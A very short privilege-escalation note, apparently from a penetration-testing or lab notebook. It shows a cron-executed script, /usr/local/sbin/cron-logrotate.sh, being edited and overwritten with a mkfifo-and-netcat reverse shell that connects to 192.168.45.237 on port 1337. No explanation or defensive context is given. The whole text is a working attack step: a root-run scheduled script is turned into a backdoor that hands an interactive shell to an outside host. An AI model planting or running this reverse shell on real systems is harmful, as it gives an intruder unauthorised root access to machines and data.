Priv Esc

vi /usr/local/sbin/cron-logrotate.sh
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.237 1337 >/tmp/f

Last updated